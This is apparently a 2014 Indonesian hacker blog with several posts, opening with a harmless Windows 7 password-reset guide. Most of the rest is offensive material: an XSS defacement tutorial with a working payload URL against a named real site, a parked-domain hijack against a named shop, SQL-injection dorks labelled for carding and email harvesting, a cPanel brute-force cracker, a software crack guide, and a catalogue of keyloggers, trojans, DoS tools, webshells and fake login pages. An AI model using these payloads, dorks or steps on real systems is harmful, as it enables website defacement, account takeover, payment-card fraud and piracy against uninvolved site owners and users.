Seperti yang telah dijelaskan sebelumnya bahwa password reset disk ini bekerja dengan mereset atau membuat ulang password baru. Maka jika anda melupakan password user, anda dapat meminta untuk membuat ulang password baru dengan password reset disk yang menyimpan password lama, sebagai bukti bahwa anda adalah pemilik PC atau salah satu user pada SO Windows 7. Oh iya, password reset disk ini hanya dapat digunakan pada satu user, dengan kata lain tidak akan bisa memulihkan user lain apalagi SO Windows pada perangkat lain.
OK, kita mulai saja pada pokok pembahasan yaitu Cara Memulihkan Windows 7 yang telah dilupakan password user-nya.
1. Masukan Flashdisk yang di dalamnya terdapat file password reset disk yaitu userkey.psw ke USB port.
2. Pada halaman tempat kita login, inputkan saja tulisan apa pun dan biarkan terjadi kesalahan. Maka, akan tampil peringatan seperti berikut, klik saja OK.
3. Kita akan kembali ke halaman tempat kita login. Namun kali ini akan terdapat tulisan Reset Password. Klik tulisan tersebut.
4. Akan muncul Password Reset Wizard. Klik saja next.
5. Selanjutnya pilih Falshdisk yang di dalamnya terdapat file password reset disk yaitu userkey.psw.
6. Maka akan terdeteksi bahwa kita benar-benar salah satu user pada SO Windows 7. Buat password baru dan klik next.
7. Selanjutnya akan muncul keterangan "You've successfull reset password for this user account" tanda anda telah berhasil membuat ulang password baru.
8. Silakan login dengan password yang baru anda buat ulang.
Maka anda telah dapat login dan mengakses kembali komputer anda.
Dengan ini anda telah berhasil Mengatasi Masalah Lupa Password User di Windows 7. Selamat sob, semoga kedepanya kita tidak pernah melupakan password apa pun, hehe.
Monday, May 5, 2014
ebook tutorial sqli manual
tutor ini dari mas 1n73ct :)
search engine hacking
https://www.4shared.com/office/MF0uq7lc/...x1n73.html
sql injection manual ( basic )
https://www.4shared.com/office/MK_NvJnh/...ckbar.html
sql injection manual ( bypass illegal mix )
https://www.4shared.com/office/_IDvioFW/..._coll.html
sql injection manual ( bypass WAF )
https://www.4shared.com/office/Yab5zq5t/...by_x1.html
sql injection PHP version 4
https://www.4shared.com/office/xrITetV-/..._4_by.html
xpath injection
http://www.4shared.com/office/lYMQ2ca6/X...n73ct.html
mssql injection in web unesco
http://www.4shared.com/office/YGiJL1xH/m...nesco.html
fast sql injection in web lapan
http://www.4shared.com/office/s2CNzbuE/F...n__in.html
*cyberbaghost aka bagus w crew
search engine hacking
https://www.4shared.com/office/MF0uq7lc/...x1n73.html
sql injection manual ( basic )
https://www.4shared.com/office/MK_NvJnh/...ckbar.html
sql injection manual ( bypass illegal mix )
https://www.4shared.com/office/_IDvioFW/..._coll.html
sql injection manual ( bypass WAF )
https://www.4shared.com/office/Yab5zq5t/...by_x1.html
sql injection PHP version 4
https://www.4shared.com/office/xrITetV-/..._4_by.html
xpath injection
http://www.4shared.com/office/lYMQ2ca6/X...n73ct.html
mssql injection in web unesco
http://www.4shared.com/office/YGiJL1xH/m...nesco.html
fast sql injection in web lapan
http://www.4shared.com/office/s2CNzbuE/F...n__in.html
*cyberbaghost aka bagus w crew
Deface Website Menggunakan Teknik XSS Vulnerability
Wah pada mau baca ya? iya pastinya buat apa buka link blog saya kalau ga
mau baca masa mau mangkal wkwkwkwkw. Oke stop tertawa saya Kang Mas
Raden Dono Sardono alias cyberbaghost si Hensem unyu-unyu akan sedikit
memberikan ilmu. Sekarang saya akan sempatkan membahas tentang Cyber Gravity lagi nih... yaitu Cara Deface Website Menggunakan Teknik XSS Vulnerability.
Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !
1). Pertama, Masukan Dorknya :
2). Kalo sudah, Pilih salah satu web yang akan kita deface.
3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.
4). Kemudian tekan Enter.
Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !
1). Pertama, Masukan Dorknya :
inurl:"/showcatrows.php?CategoryID="
2). Kalo sudah, Pilih salah satu web yang akan kita deface.
Contoh : saya pakai web ini http://www.examsolutions.co.uk/...?CategoryID=13
3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.
Contoh : http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by Dono</h1></marquee>
4). Kemudian tekan Enter.
5). Selesai, Website sudah berhasil kita deface :D
Triknya
memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS
sebuah website dengan memasukan sebuah code/script HTML.
Sekian tutorial deface website kali ini dari saya, semoga artikel
tentang Cara Deface Website Menggunakan Teknik XSS Vulnerability ini
dapat bermanfaat bagi sobat.
Ingat ya ilmu itu berguna tergantung anda menggunakannya
Sunday, May 4, 2014
Xcode galaxy terbaru
my name is khan eh ._. my name is cyberbaghost :) i jus wan sering xD
X-code galaxy adalah program untuk mendukung penetration testing, pengawasan, keamanan, sekaligus juga untuk belajar dengan berbagai referensi yang lengkap.
X-code Galaxy memberkan kemudahan untuk download program-program untuk hacking, pengawasan dan pengamanannya. selain itu juga ada fitur chatting, anda dapat berkomunikasi dengan teman-teman X-code melalui program ini yang langsung mengarah ke Media X-code.
Dalam tutorial dasar untuk sebagian tool juga ada di X-code Galaxy. Selain tutorial juga disediakan referensi dari berbagai sumber.
Dalam hal Support, X-code Galaxy memberikan layanan support secara gratis, dimana memberikan form jika anda menemukan link download yang tidak dapat digunakan pada program.
isinya antara lain:
Distro product X-code dengan licensi GPL :
- Distro Linux X-code v0.0.1
- Distro Linux X-code v0.0.2
- Distro Linux X-code v0.0.2b
Majalah elektronik X-code product X-code :
- X-code Magazine No 1 – 22 (sejak 2006)
Hacking tools produk X-code :
- Kraken X-code (Keylogger X-code yang bisa dikirim lognya)
- Xremote : Backdoor atau trojan untuk WIndows yang powerful
- Xcode BOT : BOT yang mendukung DoS
- Xcode SQLi/LFI/XSS Vulnerability Webshell Scanner
- Digital Blaster : DoS tool
- CerewetClicker – Facebook Flooder
- Keylogger Yogyafree
- MobXcode
- Xalp Finder
- John Hydra of Yogyafree
- John of Yogyafree
- X-code MD5 Cracker
Security Tools produk X-code :
- Beetrap
- Antivirus Yogyafree
- YF-Crypt
- YF Key in My Flash Drive 2.0 (BARU)
Produk-produk X-code lainnya :
- Underground Chat
- X-code Pest Fuzzer
- Pak Guru
- X-code Galaxy mobile for JAVA
- Lain-lain seperti wallpaper, skin, dst
Modul XPT
Attack and defense :
Basic Tutorial
- Command prompt
- Shell bash
Reconnaissance
- Maltego
- VisualRoute
- TraceRoute
Scanning :
- NMAP
- Angry IP Scanner
- Webcruiser
- Nikto
- Wikto
- Acunetix
Sniffing :
- Maltego
- NetworkMiner
- Wireshark
- Windump
ARP Spoofing & DNS Spoofing :
- Cain & Able
- Ettercap
Exploits :
- Metasploit Framework
- Exploit-db exploits
- Exploit lainnya
Web Exploits :
- Google Dork
- WordPress Exploits (Support password crack)
- Login Logger WordPress
- Joomla Exploits
- Login Logger Joomla
- phpBB Exploits
- Login Logger phpBB
- Drupal Exploits
- Virtuemart Exploits
- OScommerce Exploits
- Aura Exploits
- VBulletin Exploits
- PHPMyadmin Exploits
- PHPNuke Exploits
- Front Accounting Exploits
Brute Force :
- Hydra for Windows
- Tutorial hydra
- Dictionary file [Bahasan Indonesia]
- Dictionary file [Bahasan Inggris]
Shell exploitation
Windows
- Copy file
- Telnet backdoor
- Connect back dan tutorialnya
- Password exploitation [IE, Firefox, chrome]
- Hosts exploitation
- PWDUMP & John The Ripper
- Admin Windows exploitation
- Trojan r3c
Linux
- PSYBNC
- Vadim
- Ngeroot Linux (Update, banyak)
- tutorial
SQL Injection :
- Havij
- SQLMAP dan tutorialnya
- Schemafuzz
Social Enginnering tools :
- Ardamax keylogger
- Istealer 6.3
- Fake login Facebook
- Fake login Twitter
- Fake login Gmail
- Fakelogin Yahoo mail
PHP Shell Injector :
- R57
- C99
- C100
- B374k (Support link tool MD5 Encription)
- Hidden Upload
WIFI Hacking :
- Commview
- Aircrack
- Elcomsoft Wireless Security Auditor
DoS Tools :
- Netcut
- WINARPAttacker
- SMBDie
- Loic-Java
Hide now
- Platinum hide IP
- TOR
- Anonymous browsing
Target :
- Metasploitable
Tunneling
- HTTP Tunneling
- ICMP Tunneling
Computer Forensics :
- OS Forensics
- Forensics Toolkit
Analisa Malware :
- Process Monitor
- Regshot
- CaptureBAT
- OllyDbg
- Immunity Debugger + Mona.py
Instrusion Detection System
- Snort
- decaffeinatid
Security Tools :
- ARP Freeze
- OSFuscate
- Antivirus ANTIVIR
- ANTI NETCUT III
- Firewall Comodo
Support Tools :
- Mac Address Changer
- ActivePerl
- ActivePython
- LCC
- Netcat
- Putty
- Cygwin
- VirtualBox
- Aplikasi Server supports
ISO CD YF :
- CD Yogyafree Raider v1.0
- CD Yogyafree Express v11.0 x2
- CD Yogyafree Raider III
- CD YF Raider
Backtrack :
- Backtrack 5 R3 KDE 32bit
- Backtrack 5 R3 GNOME 32bit
- Backtrack 5 R3 KDE 64bit
- Backtrack 5 R3 GNOME 64bit
Kali-linux
Tools Lainnya :
- Zhider
- Zeus
- Yahoo Messenger password stealer
- wTembak
- Anti Deepfreeze 7
- KaHT
- KiTrap0D
- Unhide Passwords
- Etherflood
- FUDenkripter
- Yersinia-0.7
- Connect back
- Webcam Backdoor
- KiTrap0D
- Schemafuzz
- Unhide password
- ThumbSuck
- Process Monitor
- dst
Referensi
- Berbagai ezine dan artikel
Fitur-fitur lain :
- Konsultasi via chat [Puluhan konsultan X-code dengan berbagai spesialis]
- Friends X-code Mobile [Jejaring sosial hacker]
- Shoutbox X-code – Baru
- Chat X-code [Room X-code Chat]
- Video-video Yogyafree X-code
- Fitur musik
- Chat dengan Staff X-code
- Chat dengan Online Support
- Form untuk menginformasikan jika ada bug di X-code Galax
Bisa di download di http://galaxy.xcode.or.id/Downloads.html
*cyberbaghost aka bagus w crew
cPanel Cracker V4
Buat para pemberburu cpanel ente bisa coba ini :) walaupun ane lebih suka pake uler phyton wkwkwkw xD. Tapi ente bisa coba :0 . Penjelasan dikit ye '.')/ Tool ini gunanye buat cracking cpanel (ya iyalah di judul juga udah jelas -___- ) dengan metode bruteforce. Tinggal ente masukin aje alamat websitenya. Usernya apa kira-kira aje misal admin, administrator, atau pakai nama websitenya, nama adminnya atau bisa juga simpan nama usernya dalam 1 list txt dan passwordnya dalam 1 list txt tinggal klik aja Start biarkan tool ini bekerja sendiri.
Features :
Multi-Threading
Customized
dll
download
*cyberbaghost aka bagus w crew
Saturday, May 3, 2014
Cara Crack IDM version 6.19 build 7 (Terbaru)
Hallo om '.')/ biasah tau kan siapa ane :) orang paling ganteng seindonesia xD wkwkwkwk. Ane mau buat tutor nih gimana cara crack IDM. Pengentahu apa pengentempe aja ?wkwkwkw
1 - Close/uninstall previous version of IDM
2 - Install version 6.19 build 7
3 - Copy IDMan.exe in ''Crack'' folder and past (replace) it in orginial installed folder (normally C:\Program Files\Internet Download Manager)
4 - Run reg file
Download
*cyberbaghost aka bagus w crew
1 - Close/uninstall previous version of IDM
2 - Install version 6.19 build 7
3 - Copy IDMan.exe in ''Crack'' folder and past (replace) it in orginial installed folder (normally C:\Program Files\Internet Download Manager)
4 - Run reg file
Download
*cyberbaghost aka bagus w crew
Tutorial Parked Domain for Free Hosting
Titip nama: Majene Cyber
Pada kesempatan kali ini, saya akan share cara defacing Web
yang menggunakan Hosting gratis (anakan dari youhosting.com). Sebagai contoh
saya fokus dengan website yang menggunakan hosting idhostinger. Ok langsung
saya.
1.
Pertama-tama, saya menganggap kalian sudah
mempunyai akun idhostinger.
2.
Buka google, lalu masukin dork:
ns1.idhostinger.com
3.
Buka yang saya udah tandain (dailychanges)
4.
Pilih salah satu Web yang mau tanam script
defacing
5.
Sebagai contoh saya pilih suryapatria-shop.com
(target)
6.
Login akun idhostinger kamu, trus buat subdomain
terserah tetapi isi index.html adalah script deface kamu. Contoh punya saya.
7.
Tambahkan file index.html lalu masukkan script
deface.
8.
Lalu, masuk ke menu “Parkir Domain pada
idHostinger”
9.
Tambahkan sub-domain, dan domain yang ingin
ditanamin shell deface. Contoh :
10.
Selesai, silahkan buka parkirannya, jangan lupa
bayar uang parkirnya, nama ane “Majene Cyber”.
Note :
tutor ini hanya menambahkan sub-domain, jadi jangan iseng buat nambahin
sub-domain ke web ane soalnya web ane rata2 pake idhostinger.
Dork power full sqli
SQLI adalah salah satu teknik hacking website, melalui celah SQL. Biasanya Para hacker (bukan ane) memanfaat dork untuk mencari. Langsung aja ane kasih dork buat nyari server yang vulnerable sama sql injection.
Ni yang buat carding:
Buat nyari email, biasanya saya pake ini:
Code:
"you have an error in your sql syntax" inurl:/details.php?id=
Code:
"you have an error in your sql syntax" inurl:/events.php?id=
Code:
"you have an error in your sql syntax" inurl:/articles.php?id=
Code:
"you have an error in your sql syntax" inurl:/artist.php?id=
Code:
"you have an error in your sql syntax" inurl:/viewarticle.php?id=
Ni yang buat carding:
Code:
"you have an error in your sql syntax" inurl:/products.php?id=
Code:
"you have an error in your sql syntax" inurl:/price.php?id=
Code:
"you have an error in your sql syntax" inurl:/buy.php?id=
Code:
"you have an error in your sql syntax" inurl:/cart.php?id=
Buat nyari email, biasanya saya pake ini:
Code:
"you have an error in your sql syntax" inurl:/member.php?id=
Code:
"you have an error in your sql syntax" inurl:/comments.php?id=
*dork bisa dikembangkan so kembangkan sendiri se kreatif mungkin
#cyberbaghost aka bagus w crew
Subscribe to:
Posts (Atom)